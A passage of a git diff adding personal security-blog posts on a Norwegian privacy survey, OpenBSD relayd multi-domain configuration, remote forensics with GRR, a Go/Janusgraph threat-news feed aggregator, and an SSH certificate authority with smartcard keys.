||||||
|
situation do you feel you have?". More than half of the
|
||||||
|
respondents answered themselves, and 33% the government. The
|
||||||
|
latter is pretty amazing in my opinion. It's obviously
|
||||||
|
yourself that is responsible for your own situation. Seen in
|
||||||
|
regard to that more than 78% wouldn't pay 20 bucks a month
|
||||||
|
for privacy in online services it's even better.
|
||||||
|
|
||||||
|
The report also have it's own section dedicated to the
|
||||||
|
Snowden revelations. Pretty interesting that 53% responded
|
||||||
|
that they didn't care about the surveillance, it is
|
||||||
|
unproblematic or that it's just plain
|
||||||
|
necessary. Interesting, considering that it's another nation
|
||||||
|
state than Norway we're talking about here. I could have
|
||||||
|
understood it if it was our own government, but another
|
||||||
|
country? Anyways, that's the facts.
|
||||||
|
|
||||||
|
One question that I perhaps miss in the survey is "have you
|
||||||
|
done anything to protect your online presence from
|
||||||
|
surveillance?". One of the alternatives could for instance
|
||||||
|
be: "I use end-to-end encryption, such as GPG". It was
|
||||||
|
obviously not that technical a survey, and I can respect
|
||||||
|
that - but at the same time I see that's where it have to
|
||||||
|
end at some point. Thinking if I was employed in another
|
||||||
|
type of occupation: I think people would have continued as
|
||||||
|
normal if we get a mass-surveillance state because you get
|
||||||
|
to a point of exhaustion due to the complexity of the
|
||||||
|
technology and lack of knowledge on how to actually protect
|
||||||
|
yourself. I also think that the hypothetical question of
|
||||||
|
awareness of a mass-surveillance state would have had more
|
||||||
|
chilling effects than people actually respond. The question
|
||||||
|
actually reminds me of the Iron Curtain period, thinking
|
||||||
|
that you are always surveilled.
|
||||||
|
|
||||||
|
The survey can be read in full here [2] (Norwegian), and I
|
||||||
|
think it's pretty good and thorough on the current state of
|
||||||
|
privacy in Norway. The survey was delivered by Opinion
|
||||||
|
Perduco. The 1997 survey was delivered by Statistics Norway.
|
||||||
|
|
||||||
|
|
||||||
|
[1] http://translate.google.com/translate?sl=auto&tl=en&js=n&prev=_t&hl=en&ie=UTF-8&u=http%3A%2F%2Fwww.digi.no%2F926712%2Fhalvparten-gir-blaffen
|
||||||
|
[2] https://www.datatilsynet.no/Nyheter/2014/Personvern-2014-tilstand-og-trender-/
|
||||||
|
|
||||||
|
|
||||||
|
|
134
data/relayd-multidomain.md
Normal file
134
data/relayd-multidomain.md
Normal file
|
@ -0,0 +1,134 @@
|
||||||
|
While running a relayd service for a multi-domain instance
|
||||||
|
recently I quickly came into an issue with relayd routing.
|
||||||
|
|
||||||
|
relayd(8) is the relay daemon in OpenBSD.
|
||||||
|
|
||||||
|
I run two local services that I front with relayd:
|
||||||
|
|
||||||
|
* service A
|
||||||
|
* service B
|
||||||
|
|
||||||
|
These two I define in relayd.conf(5):
|
||||||
|
|
||||||
|
ext_addr="<SOME-IP>"
|
||||||
|
honk_port="31337"
|
||||||
|
inks_port="31338"
|
||||||
|
table <serviceA> { 127.0.0.1 }
|
||||||
|
table <serviceB> { 127.0.0.1 }
|
||||||
|
|
||||||
|
To make sure relayd logs sufficiently for traceability I apply the
|
||||||
|
following options:
|
||||||
|
|
||||||
|
log state changes
|
||||||
|
log connection
|
||||||
|
|
||||||
|
The next part of my relayd.conf is creating a configuration for
|
||||||
|
the relay service ("protocols are templates defining settings and rules for relays"):
|
||||||
|
|
||||||
|
http protocol https { }
|
||||||
|
|
||||||
|
For the service definition I make sure to add the remote address
|
||||||
|
and local address:
|
||||||
|
|
||||||
|
match request header append "X-Forwarded-For" value "$REMOTE_ADDR"
|
||||||
|
match request header append "X-Forwarded-By" \
|
||||||
|
value "$SERVER_ADDR:$SERVER_PORT"
|
||||||
|
|
||||||
|
A further important logging configuration comes next, and I make
|
||||||
|
sure my relay logs the host, X-Forwarded-For, User-Agent,
|
||||||
|
Referer and url:
|
||||||
|
|
||||||
|
match header log "Host"
|
||||||
|
match header log "X-Forwarded-For"
|
||||||
|
match header log "User-Agent"
|
||||||
|
match header log "Referer"
|
||||||
|
match url log
|
||||||
|
|
||||||
|
For performance [1]:
|
||||||
|
|
||||||
|
tcp { nodelay, sack, socket buffer 65536, backlog 100 }
|
||||||
|
|
||||||
|
Next I disable vulnerable ciphers:
|
||||||
|
|
||||||
|
tls no tlsv1.0
|
||||||
|
tls no tlsv1.1
|
||||||
|
tls tlsv1.2
|
||||||
|
|
||||||
|
Sadly tlsv1.3 is still in -current, so we will have to wait for
|
||||||
|
that.
|
||||||
|
|
||||||
|
I configure keys like follows:
|
||||||
|
|
||||||
|
tls ca cert "/etc/ssl/cert.pem"
|
||||||
|
tls keypair serviceA.domain
|
||||||
|
tls keypair serviceB.domain
|
||||||
|
|
||||||
|
Finally we use the tables defined initially to route traffic to
|
||||||
|
the right internal service:
|
||||||
|
|
||||||
|
match request header "Host" value "serviceA.domain" forward to <serviceA>
|
||||||
|
match request header "Host" value "serviceB.domain" forward to <serviceB>
|
||||||
|
|
||||||
|
And that is it for the service definition.
|
||||||
|
|
||||||
|
In addition we define the relay ("relays will forward traffic
|
||||||
|
between a client and a target server") like follows. The "protocol
|
||||||
|
https" is the junction between the two parts of the config.
|
||||||
|
|
||||||
|
relay https_relay {
|
||||||
|
listen on $ext_addr port https tls
|
||||||
|
protocol https
|
||||||
|
|
||||||
|
forward to <honk> port $honk_port check tcp
|
||||||
|
forward to <inks> port $inks_port check tcp
|
||||||
|
}
|
||||||
|
|
||||||
|
The whole config:
|
||||||
|
|
||||||
|
ext_addr="159.100.245.242"
|
||||||
|
honk_port="31337"
|
||||||
|
inks_port="31338"
|
||||||
|
table <honk> { 127.0.0.1 }
|
||||||
|
table <inks> { 127.0.0.1 }
|
||||||
|
|
||||||
|
log state changes
|
||||||
|
log connection
|
||||||
|
|
||||||
|
http protocol https {
|
||||||
|
match request header append "X-Forwarded-For" value "$REMOTE_ADDR"
|
||||||
|
match request header append "X-Forwarded-By" \
|
||||||
|
value "$SERVER_ADDR:$SERVER_PORT"
|
||||||
|
match request header set "Connection" value "close"
|
||||||
|
|
||||||
|
match header log "Host"
|
||||||
|
match header log "X-Forwarded-For"
|
||||||
|
match header log "User-Agent"
|
||||||
|
match header log "Referer"
|
||||||
|
match url log
|
||||||
|
|
||||||
|
tcp { nodelay, socket buffer 65536, backlog 100 }
|
||||||
|
|
||||||
|
tls no tlsv1.0
|
||||||
|
tls no tlsv1.1
|
||||||
|
tls tlsv1.2
|
||||||
|
tls ca cert "/etc/ssl/cert.pem"
|
||||||
|
|
||||||
|
tls keypair cybsec.network
|
||||||
|
tls keypair inks.cybsec.network
|
||||||
|
|
||||||
|
match request header "Host" value "cybsec.network" forward to <honk>
|
||||||
|
match request header "Host" value "inks.cybsec.network" forward to <inks>
|
||||||
|
}
|
||||||
|
|
||||||
|
relay https_relay {
|
||||||
|
listen on $ext_addr port https tls
|
||||||
|
protocol https
|
||||||
|
|
||||||
|
forward to <honk> port $honk_port check tcp
|
||||||
|
forward to <inks> port $inks_port check tcp
|
||||||
|
}
|
||||||
|
|
||||||
|
|
||||||
|
[1] https://calomel.org/relayd.html
|
||||||
|
|
||||||
|
|
159
data/remote-forensics.md
Normal file
159
data/remote-forensics.md
Normal file
|
@ -0,0 +1,159 @@
|
||||||
|
Like everything else in information security, forensics is
|
||||||
|
constantly evolving. One matter of special interest for
|
||||||
|
practitioners is doing forensics on remote computers, not that
|
||||||
|
it's entirely new.
|
||||||
|
|
||||||
|
The use-case is self-explanatory to those working in the field,
|
||||||
|
but for the beginners I'll give a brief introduction.
|
||||||
|
|
||||||
|
When you get a case on your desk and it lights up as something
|
||||||
|
interesting, what do you do? Probably your first step is searching
|
||||||
|
for known malicious indicators in network logs. Finding something
|
||||||
|
interesting on some of the clients, let's say ten in this case,
|
||||||
|
you decide to put some more effort into explaining the nature of
|
||||||
|
the activity. None of the clients is nearby, multiple of them are
|
||||||
|
even on locations with 1Mbps upload speeds.
|
||||||
|
|
||||||
|
The next phase would probably be a search in open sources, perhaps
|
||||||
|
turning out in support of something fishy going on. Now you'd like
|
||||||
|
to examine some of the client logs for known hashes and strings
|
||||||
|
you found, and the traditional way to go is acquiring disk and
|
||||||
|
memory images physically. Or is it? That would have easily taken
|
||||||
|
weeks for ten clients. In this case you are lucky and you have a
|
||||||
|
tool for performing remote forensics at hand. The tool was a major
|
||||||
|
roll-out for your organization after a larger breach.
|
||||||
|
|
||||||
|
What's new in remote forensics is that the tools begin to get more
|
||||||
|
mature, and by that I would like to introduce two products of
|
||||||
|
which I find most relevant to the purpose:
|
||||||
|
|
||||||
|
* Google Rapid Response (GRR) [1]
|
||||||
|
* Mandiant for Incident Response (MIR) [2]
|
||||||
|
|
||||||
|
Actually I haven't put the latter option to the test (MIR supports
|
||||||
|
OpenIOC which is an advantage) - but I have chosen to take GRR
|
||||||
|
for a spin for some time now. There are also other tools which may
|
||||||
|
be of interest to you such as Sourcefire FireAmp which I've heard
|
||||||
|
performs well for end-point-protection. I've chosen to leave that
|
||||||
|
out this presentation since this is about a different
|
||||||
|
concept. Surprisingly the following will use GRR as a basis.
|
||||||
|
|
||||||
|
For this post there are two prerequisites for you to follow in
|
||||||
|
which I highly recommend to get the feel with GRR:
|
||||||
|
|
||||||
|
* Setup a GRR server [3]. In this post I've used the current beta
|
||||||
|
3.0-2, running all services on the same machine, including the
|
||||||
|
web server and client roll-in interface. There is one install
|
||||||
|
script for the beloved Ubuntu here, but I couldn't get it easily
|
||||||
|
working on other systems. One exception is Debian which only
|
||||||
|
needed minor changes. If you have difficulties with the latter,
|
||||||
|
please give me a heads-up.
|
||||||
|
* Sacrifice one client (it won't brick a production system as far
|
||||||
|
as I can tell either though) to be monitored. You will find
|
||||||
|
binaries after packing the clients in the GRR Server setup. See
|
||||||
|
the screenshot below for details. The client will automatically
|
||||||
|
report in to the server.
|
||||||
|
|
||||||
|
You can find the binaries by browsing from the home screen in the
|
||||||
|
GRR web GUI. Download and install the one of choice.
|
||||||
|
|
||||||
|
A word warning before you read the rest of this post: The GRR
|
||||||
|
website ~~is~~ was a little messy and not entirely intuitive. I
|
||||||
|
found, after a lot of searching, that the best way to go about it
|
||||||
|
is reading the code usage examples in the web GUI, especially when
|
||||||
|
it comes to what Google named flows. Flows are little plugins in
|
||||||
|
GRR that may for instance help you task GRR to fetch a file on a
|
||||||
|
specific path.
|
||||||
|
|
||||||
|
Notice the call spec. This can be transferred directly to the
|
||||||
|
iPython console. Before I started off I watched a couple of
|
||||||
|
presentations that Google have delivered at LISA. I think you
|
||||||
|
should too if you'd like to see where GRR is going and why it came
|
||||||
|
to be. The one here gives a thorough introduction on how Google
|
||||||
|
makes sure they are able to respond to breaches in their
|
||||||
|
infrastructure [4].
|
||||||
|
|
||||||
|
I would also like to recommend an presentation by Greg Castle on
|
||||||
|
BlackHat for reference [5]. For usage and examples Marley Jaffe
|
||||||
|
at Champlain College have put up a great paper. Have a look at the
|
||||||
|
exercises at the end of it.
|
||||||
|
|
||||||
|
What is good with GRR is that it supports the most relevant
|
||||||
|
platforms: Linux, Windows and OS X. This is also fully supported
|
||||||
|
platforms at Google, so expect development to have a practical and
|
||||||
|
long-term perspective.
|
||||||
|
|
||||||
|
While GRR is relevant, it is also fully open source, and
|
||||||
|
extensible. It's written in Python with all the niceness that
|
||||||
|
comes with it. GRR have direct memory access by custom built
|
||||||
|
drivers. You will find support for Volatility in there. Well they
|
||||||
|
forked it into a new project named Rekall which is more suited for
|
||||||
|
scale. Anyways it provides support for plugins such as Yara.
|
||||||
|
|
||||||
|
If you are like me and got introduced to forensics through
|
||||||
|
academia, you will like that GRR builds on Sleuthkit through pytsk
|
||||||
|
for disk forensics (actually you may choose what layer you'd like
|
||||||
|
to stay on). When you've retrieved an item, I just love that it
|
||||||
|
gets placed in a virtual file system in GRR with complete
|
||||||
|
versioning.
|
||||||
|
|
||||||
|
The virtual filesystem where all the stuff you've retrieved or
|
||||||
|
queried the client about is stored with versioning for you
|
||||||
|
pleasure. In addition to having a way-to-go console application
|
||||||
|
GRR provides a good web GUI which provides an intuitive way of
|
||||||
|
browsing about everything you can do in the console. I think the
|
||||||
|
console is where Google would like you to live though.
|
||||||
|
|
||||||
|
An so I ended up on the grr_console which is a purpose-build
|
||||||
|
iPython shell, writing scripts for doing what I needed it to
|
||||||
|
do. Remember that call spec that I mentioned initially, here is
|
||||||
|
where it gets into play. Below you see an example using the
|
||||||
|
GetFile call spec (notice that the pathspec in the flow statement
|
||||||
|
says OS, this might as well have been ``REGISTRY`` or ``TSK``):
|
||||||
|
|
||||||
|
|
||||||
|
token = access_control.ACLToken(username="someone", reason="Why")
|
||||||
|
|
||||||
|
flows=[]
|
||||||
|
path="/home/someone/nohup.out"
|
||||||
|
|
||||||
|
for client in SearchClients('host:Webserver'):
|
||||||
|
id=client[0].client_id
|
||||||
|
o=flow.GRRFlow.StartFlow(client_id=str(id),
|
||||||
|
flow_name="GetFile", pathspec=rdfvalue.PathSpec(path=path, pathtype=rdfvalue.PathSpec.PathType.OS))
|
||||||
|
flows.append(o)
|
||||||
|
|
||||||
|
files=[]
|
||||||
|
while len(flows)>0:
|
||||||
|
for o in flows:
|
||||||
|
f=aff4.FACTORY.Open(o)
|
||||||
|
r = f.GetRunner()
|
||||||
|
if not r.IsRunning():
|
||||||
|
fd=aff4.FACTORY.Open(str(id)+"/fs/os%s"%path, token=token)
|
||||||
|
files.append(str(fd.Read(10000)))
|
||||||
|
flows.remove(o)
|
||||||
|
|
||||||
|
If interested in Mandiant IR (MIR) and its concept, I'd like to
|
||||||
|
recommend another Youtube video by Douglas Wilson, which is quite
|
||||||
|
awesome as well [7].
|
||||||
|
|
||||||
|
Update 2020: Today I wouldn't recommend MIR/FireEye HX, but rather
|
||||||
|
something like LimaCharlie [8] due to the lack of hunting
|
||||||
|
capabilities in the HX platform.
|
||||||
|
|
||||||
|
|
||||||
|
[1] https://github.com/google/grr
|
||||||
|
|
||||||
|
[2] http://www.fireeye.com/products-and-solutions/endpoint-forensics.html
|
||||||
|
|
||||||
|
[3] https://grr-doc.readthedocs.io/en/latest/installing-grr-server/index.html
|
||||||
|
|
||||||
|
[4] https://2459d6dc103cb5933875-c0245c5c937c5dedcca3f1764ecc9b2f.ssl.cf2.rackcdn.com/lisa13/castle.mp4
|
||||||
|
|
||||||
|
[5] GRR: Find All The Badness - https://docs.google.com/file/d/0B1wsLqFoT7i2Z2pxM0wycS1lcjg/edit?pli=1
|
||||||
|
|
||||||
|
[6] Jaffe, Marley. GRR Capstone Final Paper
|
||||||
|
|
||||||
|
[7] NoVA Hackers Doug Wilson - Lessons Learned from using OpenIOC: https://www.youtube.com/watch?v=L-J5DDG_SQ8
|
||||||
|
|
||||||
|
[8] https://www.limacharlie.io/
|
219
data/signals-feeds.md
Normal file
219
data/signals-feeds.md
Normal file
|
@ -0,0 +1,219 @@
|
||||||
|
|
||||||
|
## Key Takeaways
|
||||||
|
|
||||||
|
* It is possible to index and tag a high number of RSS, OTX and
|
||||||
|
Twitter articles on limited computational power in seconds
|
||||||
|
* Building logic around timestamps is complex
|
||||||
|
* Structuring the resulting data in a graph is meaningful.
|
||||||
|
|
||||||
|
## Introduction
|
||||||
|
|
||||||
|
Today I am sharing some details about one of the multi-year
|
||||||
|
projects I am running. The project motivation is:
|
||||||
|
|
||||||
|
> To stay up to date on cyber security developments within days.
|
||||||
|
|
||||||
|
I didn't want a realtime alerting service, but an analysis tool to
|
||||||
|
gather important fragments of data over time. These fragments
|
||||||
|
makes up the basis of my open source research. The curated
|
||||||
|
information usually ends up on a channel like an NNTP feed,
|
||||||
|
sometimes with added comments.
|
||||||
|
|
||||||
|
My solution was to create a common interface to ingest and search
|
||||||
|
content from third party sources, Achieving this is difficult, and
|
||||||
|
requires some work, but I found it feasible.
|
||||||
|
|
||||||
|
Going throught some basic research I found that much of what
|
||||||
|
happens on the web eventually ends up on one of the following
|
||||||
|
three places (e.g. a mention):
|
||||||
|
|
||||||
|
1. OTX
|
||||||
|
2. Twitter
|
||||||
|
3. RSS
|
||||||
|
|
||||||
|
After some work I found that there were two things important to me
|
||||||
|
in the first iteration:
|
||||||
|
|
||||||
|
1. Being able to recognize the characteristics of the content
|
||||||
|
2. Knowing the publish time of the data
|
||||||
|
|
||||||
|
The primary problem was thus to build a program that scales with a
|
||||||
|
large number of feeds.
|
||||||
|
|
||||||
|
Going from there I built a prototype in Python, which I've now
|
||||||
|
matured into a more performant Golang version. What follows from
|
||||||
|
here is my experience from that work.
|
||||||
|
|
||||||
|
The tested component list of the program I am currently running are:
|
||||||
|
|
||||||
|
* Gofeed [1]
|
||||||
|
* Badger [2]
|
||||||
|
* Apache Janusgraph [3,4]
|
||||||
|
* Apache Cassandra [5]
|
||||||
|
* Go-Twitter [6]
|
||||||
|
* Alienvault OTX API [7]
|
||||||
|
* Araddon Dateparse [8]
|
||||||
|
|
||||||
|
[1] https://github.com/mmcdole/gofeed
|
||||||
|
[2] https://github.com/dgraph-io/badger
|
||||||
|
[3] https://janusgraph.org
|
||||||
|
[4] https://docs.janusgraph.org/basics/gremlin/
|
||||||
|
[5] https://cassandra.apache.org
|
||||||
|
[6] https://github.com/dghubble/go-twitter/twitter
|
||||||
|
[7] https://github.com/AlienVault-OTX/OTX-Go-SDK/src/otxapi
|
||||||
|
[8] https://github.com/araddon/dateparse
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
## The Lesson of Guestimation: Not All Feeds Are Created Equal
|
||||||
|
|
||||||
|
Timestamps is perhaps some of the more challenging things to
|
||||||
|
interpret in a crawler and search engine. RSS is a loose standard,
|
||||||
|
at least when it comes to implementation. This means that
|
||||||
|
timestamps may vary: localized, invalid per the RFC standards,
|
||||||
|
ambiguous, missing and so on. Much like the web otherwise. Luckily
|
||||||
|
without javascript.
|
||||||
|
|
||||||
|
The goal is simply about recognizing what timestamp are the most
|
||||||
|
correct one. A feed may contain one form of timestamp, while a
|
||||||
|
website may indicate another one. To solve this I use and compare
|
||||||
|
two levels of timestamping:
|
||||||
|
|
||||||
|
* The feed published, updated and all items individual timestamps
|
||||||
|
* The item and website last modified timestamps
|
||||||
|
|
||||||
|
Looking back, solving the first level of timestamping was
|
||||||
|
straight forward. These timestamps are present in the feed and for
|
||||||
|
RSS the logic to build a list of timestamps would look like this:
|
||||||
|
|
||||||
|
|
||||||
|
/* First we check the timestamp of all
|
||||||
|
* feed items (including the primary).
|
||||||
|
* We then estimate what is the newest
|
||||||
|
* one */
|
||||||
|
var feedElectedTime time.Time
|
||||||
|
var ts = make(map[string]string)
|
||||||
|
ts["published"] = feed.Published
|
||||||
|
ts["updated"] = feed.Updated
|
||||||
|
var i=0
|
||||||
|
for _, item := range feed.Items {
|
||||||
|
ts[strconv.Itoa(i)] = item.Published
|
||||||
|
i++
|
||||||
|
ts[strconv.Itoa(i)] = item.Updated
|
||||||
|
i++
|
||||||
|
}
|
||||||
|
feedElectedTime, _, err = tsGuestimate(ts, link, false)
|
||||||
|
|
||||||
|
The elected time can be used to compare with a previous feed
|
||||||
|
checkpoint to avoid downloading all items again. Using the above
|
||||||
|
logic I was also able to dramatically increase the success rate of
|
||||||
|
the program, since it requires a valid timestamp. The
|
||||||
|
`tsGuestimate` logic is something for a future post.
|
||||||
|
|
||||||
|
Further the item/website timestamps requires a similar method, but in
|
||||||
|
addition I found it an advantage to do a HTTP HEAD request to the
|
||||||
|
destination URL to combine with the timestamps available from the
|
||||||
|
feed. The central and important aspect here is to abort retrieval
|
||||||
|
if an item already exists in the database, this is dramatically
|
||||||
|
increases the processing in each run.
|
||||||
|
|
||||||
|
False timestamps are a problem. I noticed that websites publish
|
||||||
|
feeds with dynamic timestamps, which means that when you retrieve
|
||||||
|
the feed it adds the timestamp of now. This obviously creates
|
||||||
|
resource-intesive operations since the whole feed is then at risk
|
||||||
|
for re-indexing each run.
|
||||||
|
|
||||||
|
|
||||||
|
## Noise Reduction: Recognizing Content Characteristics
|
||||||
|
|
||||||
|
Retrieving content is possible in several ways. For recognizing the
|
||||||
|
content I opted for and have success/good coverage using
|
||||||
|
regex. This is also some of the good things of curating articles,
|
||||||
|
since this means experience with questions such as "why did I miss
|
||||||
|
this article?" evolves into a new iteration of the program input.
|
||||||
|
|
||||||
|
For instance, to stay on top of targeted cyber operations, I found
|
||||||
|
that much used phrases in articles was "targeted attack" and
|
||||||
|
"spear phishing". So based on that I deployed the following
|
||||||
|
keyword search (regular expression) which applies to every new
|
||||||
|
item ingested:
|
||||||
|
|
||||||
|
"targeted":"(?i)targeted\\satt|spear\\sp",
|
||||||
|
|
||||||
|
So a new article containing "targeted attack" in the body or title
|
||||||
|
is tagged with a hotword "targeted". Another hotword could be
|
||||||
|
"breach".
|
||||||
|
|
||||||
|
Perhaps not surprising this data can be modelled in a graph like
|
||||||
|
follows.
|
||||||
|
|
||||||
|
Tweet ─> URL in tweet ┌─> Targeted
|
||||||
|
└─> Breach
|
||||||
|
|
||||||
|
## A Practical Example
|
||||||
|
|
||||||
|
Traversing a news graph, we can go from the hotword "targeted", to
|
||||||
|
all items and articles for the past days linked to the hotword.
|
||||||
|
|
||||||
|
I use Gremlin for querying. An example is shown below (some
|
||||||
|
details omitted):
|
||||||
|
|
||||||
|
keyw="targeted"
|
||||||
|
_date="2021-02-10"
|
||||||
|
g.V().hasLabel('hotword').has('title',keyw).as("origin_hw").
|
||||||
|
in().in().hasLabel('article:m').has('timestamp',gte(_date)).order().by('timestamp',asc).as('article').
|
||||||
|
.select("origin_hw","article").by(values('title','timestamp'))
|
||||||
|
|
||||||
|
The procedure above summarized:
|
||||||
|
|
||||||
|
1. Find the node with the keyword "targeted"
|
||||||
|
2. Find all articles (for instance a tweet) that are two steps out
|
||||||
|
from the keyword (since these may be linked via a content node)
|
||||||
|
3. Get title and timestamp from hotword and tweet
|
||||||
|
|
||||||
|
Using a match, which was incidentally not a tweet but an article,
|
||||||
|
from a RSS feed, we find the following:
|
||||||
|
|
||||||
|
==>{origin_hw=targeted, article=WINDOWS KERNEL ZERO-DAY EXPLOIT (CVE-2021-1732) IS USED BY BITTER APT IN TARGETED ATTACK}
|
||||||
|
|
||||||
|
Retrieving the article with Gremlin, we can decide the source:
|
||||||
|
|
||||||
|
gremlin > g.V().has('title','WINDOWS KERNEL ZERO-DAY EXPLOIT (CVE-2021-1732) IS USED BY BITTER APT IN TARGETED ATTACK').valueMap()
|
||||||
|
|
||||||
|
|
||||||
|
=>{link=[https://www.reddit.com/r/netsec/.rss],
|
||||||
|
title=[WINDOWS KERNEL ZERO-DAY EXPLOIT (CVE-2021-1732) IS USED BY BITTER APT IN TARGETED ATTACK],
|
||||||
|
src=[Reddit - NetSec],
|
||||||
|
src_type=[rss],
|
||||||
|
sha256=[8a285ce1b6d157f83d9469c06b6accaa514c794042ae7243056292d4ea245daf],
|
||||||
|
added=[2021-02-12 10:42:16.640587 +0100 CET],
|
||||||
|
timestamp=[2021-02-10 20:31:06 +0000 +0000],
|
||||||
|
version=[1]}
|
||||||
|
|
||||||
|
==>{link=[http://www.reddit.com/r/Malware/.rss],
|
||||||
|
title=[WINDOWS KERNEL ZERO-DAY EXPLOIT (CVE-2021-1732) IS USED BY BITTER APT IN TARGETED ATTACK],
|
||||||
|
src=[Reddit - Malware],
|
||||||
|
src_type=[rss],
|
||||||
|
sha256=[69737b754a7d9605d11aecff730ca3fc244c319f35174a7b37dd0d1846a823b7],
|
||||||
|
added=[2021-02-12 10:41:48.510538 +0100 CET],
|
||||||
|
timestamp=[2021-02-10 20:35:11 +0000 +0000],
|
||||||
|
version=[1]}
|
||||||
|
|
||||||
|
In this instance the source was two Reddit posts which triggered
|
||||||
|
the keyword in question and others about a targeted incident in
|
||||||
|
China. Additionally this triggered a zero day hotword.
|
||||||
|
|
||||||
|
|
||||||
|
## Summary
|
||||||
|
|
||||||
|
Through this post I have shown some key parts of how to build a
|
||||||
|
feed aggregator that can scale to thousands of feeds on a single
|
||||||
|
computer, with update times in seconds.
|
||||||
|
|
||||||
|
I have also given a brief view on how Janusgraph and similar
|
||||||
|
systems can be used to model such data in a way which makes it
|
||||||
|
possible to search, find and eventually stay up to date on
|
||||||
|
relevant information to cyber security.
|
||||||
|
|
||||||
|
When in place such a system may save hours per day since the data
|
||||||
|
is normalised and searchable in one place.
|
228
data/ssh-ca-proxyjump.md
Normal file
228
data/ssh-ca-proxyjump.md
Normal file
|
@ -0,0 +1,228 @@
|
||||||
|
## Key Takeaways
|
||||||
|
|
||||||
|
* SSH has a key-signing concept that in combination with a
|
||||||
|
smartcard provides a lean, off-disk process
|
||||||
|
* A SSH-CA provides the possibility of managing access
|
||||||
|
without a central point of failure
|
||||||
|
* The use of SSH Jumphost is an easier way to tunnel
|
||||||
|
sessions end-to-end encrypted, while still maintaining
|
||||||
|
visibility and control through a central point
|
||||||
|
|
||||||
|
## Introduction
|
||||||
|
|
||||||
|
This post is an all-in-one capture of my recent discoveries with
|
||||||
|
SSH. It is an introduction for a technical audience.
|
||||||
|
|
||||||
|
It turns out that SSH is ready for a zero trust and
|
||||||
|
microsegmentation approach, which is important for
|
||||||
|
management of servers. Everything described in this post is
|
||||||
|
available as open source software, but some parts require a
|
||||||
|
smartcard or two, such as a Yubikey (or a Nitrokey if you
|
||||||
|
prefer open source. I describe both).
|
||||||
|
|
||||||
|
I also go into detail on how to configure the CA key without
|
||||||
|
letting the key touch the computer, which is an important
|
||||||
|
principle.
|
||||||
|
|
||||||
|
The end-result should be a more an architecture providing a better
|
||||||
|
overview of the infrastructure and a second logon-factor
|
||||||
|
independent of phones and OATH.
|
||||||
|
|
||||||
|
## SSH-CA
|
||||||
|
|
||||||
|
My exploration started when I read a 2016-article by
|
||||||
|
Facebook engineering [1]. Surprised, but concerned with the
|
||||||
|
configuration overhead and reliability I set out to test the
|
||||||
|
SSH-CA concept. Two days later all my servers were on a new
|
||||||
|
architecture.
|
||||||
|
|
||||||
|
SSH-CA works predictably like follows:
|
||||||
|
|
||||||
|
[ User generates key on Yubikey ]
|
||||||
|
|
|
||||||
|
|
|
||||||
|
v
|
||||||
|
[ ssh-keygen generates CA key ] --------> [ signs pubkey of Yubikey ]
|
||||||
|
| - for a set of security zones
|
||||||
|
| - for users
|
||||||
|
| |
|
||||||
|
| |
|
||||||
|
| v
|
||||||
|
v pubkey cert is distributed to user
|
||||||
|
[ CA cert and zones pushed to servers ] - id_rsa-cert.pub
|
||||||
|
- auth_principals/root (root-everywhere)
|
||||||
|
- auth_principals/web (zone-web)
|
||||||
|
|
||||||
|
The commands required in a nutshell:
|
||||||
|
|
||||||
|
# on client
|
||||||
|
$ ssh-keygen -t rsa
|
||||||
|
|
||||||
|
# on server
|
||||||
|
$ ssh-keygen -C CA -f ca
|
||||||
|
$ ssh-keygen -s ca -I <id-for-logs> -n zone-web -V +1w -z 1 id_ecdsa.pub
|
||||||
|
|
||||||
|
# on client
|
||||||
|
cp id_ecdsa-cert.pub ~/.ssh/
|
||||||
|
|
||||||
|
Please refer to the next section for a best practice storage
|
||||||
|
of your private key.
|
||||||
|
|
||||||
|
On the SSH server, add the following to the SSHD config:
|
||||||
|
|
||||||
|
TrustedUserCAKeys /etc/ssh/ca.pub
|
||||||
|
AuthorizedPrincipalsFile /etc/ssh/auth_principals/%u
|
||||||
|
|
||||||
|
What was conceptually new for me was principals and
|
||||||
|
authorization files per server. This is how it works:
|
||||||
|
|
||||||
|
1. Add a security zone, like zone-web, during certificate
|
||||||
|
signing - "ssh-keygen * -n zone-web *". Local username does
|
||||||
|
not matter
|
||||||
|
2. Add a file per user on the SSH server, where zone-web
|
||||||
|
is added where applicable -
|
||||||
|
e.g. "/etc/ssh/auth_principals/some-user" contains "zone-web"
|
||||||
|
3. Login with the same user as given in the zone file - "ssh some-user@server"
|
||||||
|
|
||||||
|
This is the same as applying a role instead of a name to the
|
||||||
|
authorization system, while something that IDs the user is
|
||||||
|
added to certificate and logged when used.
|
||||||
|
|
||||||
|
This leaves us with a way better authorization and
|
||||||
|
authentication scheme than authorized_keys that everyone
|
||||||
|
uses. Read on to get the details for generating the CA key
|
||||||
|
securely.
|
||||||
|
|
||||||
|
|
||||||
|
## Keeping Private Keys Off-disk
|
||||||
|
|
||||||
|
An important principle I have about private keys is to
|
||||||
|
rather cross-sign and encrypt two keys than to store one on
|
||||||
|
disk. This was challenged for the SSH-CA design. Luckily I found
|
||||||
|
an article describing the details of PKCS11 with ssh-keygen
|
||||||
|
[2]:
|
||||||
|
|
||||||
|
> If you're using pkcs11 tokens to hold your ssh key, you
|
||||||
|
> may need to run ssh-keygen -D $PKCS11_MODULE_PATH
|
||||||
|
> ~/.ssh/id_rsa.pub so that you have a public key to
|
||||||
|
> sign. If your CA private key is being held in a pkcs11
|
||||||
|
> token, you can use the -D parameter, in this case the -s
|
||||||
|
> parameter has to point to the public key of the CA.
|
||||||
|
|
||||||
|
Yubikeys on macOS 11 (Big Sur) requires the yubico-piv-tool
|
||||||
|
to provide PKCS#11 drivers. It can be installed using
|
||||||
|
Homebrew:
|
||||||
|
|
||||||
|
$ brew install yubico-piv-tool
|
||||||
|
$ PKCS11_MODULE_PATH=/usr/local/lib/libykcs11.dylib
|
||||||
|
|
||||||
|
Similarly the procedure for Nitrokey are:
|
||||||
|
|
||||||
|
$ brew cask install opensc
|
||||||
|
$ PKCS11_MODULE_PATH=/usr/local/lib/opensc-pkcs11.so
|
||||||
|
|
||||||
|
Generating a key on-card for Yubikey:
|
||||||
|
|
||||||
|
$ yubico-piv-tool -s 9a -a generate -o public.pem
|
||||||
|
|
||||||
|
For the Nitrokey:
|
||||||
|
|
||||||
|
$ pkcs11-tool -l --login-type so --keypairgen --key-type RSA:2048
|
||||||
|
|
||||||
|
Using the exported CA pubkey and the private key on-card a
|
||||||
|
certificate may now be signed and distributed to the user.
|
||||||
|
|
||||||
|
$ ssh-keygen -D $PKCS11_MODULE_PATH -e > ca.pub
|
||||||
|
|
||||||
|
